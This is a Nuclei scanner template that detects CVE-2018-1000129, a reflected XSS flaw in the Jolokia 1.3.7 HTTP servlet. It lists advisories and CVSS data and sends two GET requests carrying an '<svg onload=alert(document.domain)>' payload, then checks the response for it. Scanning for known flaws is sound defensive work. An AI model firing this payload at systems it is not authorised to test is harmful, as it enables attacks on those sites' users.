nuclei-templates/cves/2018/CVE-2018-1000129.yaml

37 lines
1.2 KiB
YAML

id: CVE-2018-1000129
info:
name: Jolokia XSS
author: mavericknerd,0h1in9e
severity: medium
description: An XSS vulnerability exists in the Jolokia agent version 1.3.7 in the HTTP servlet that allows an attacker to execute malicious javascript in the victim's browser.
reference:
- https://jolokia.org/#Security_fixes_with_1.5.0
- https://github.com/rhuss/jolokia/commit/5895d5c137c335e6b473e9dcb9baf748851bbc5f#diff-f19898247eddb55de6400489bff748ad
- https://access.redhat.com/errata/RHSA-2018:2669
- https://access.redhat.com/errata/RHSA-2018:3817
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-1000129
cwe-id: CWE-79
tags: cve,cve2018,jolokia,xss
requests:
- method: GET
path:
- "{{BaseURL}}/jolokia/read<svg onload=alert(document.domain)>?mimeType=text/html"
- "{{BaseURL}}/api/jolokia/read<svg onload=alert(document.domain)>?mimeType=text/html"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<svg onload=alert(document.domain)>"
part: body
- type: word
words:
- "text/html"
part: header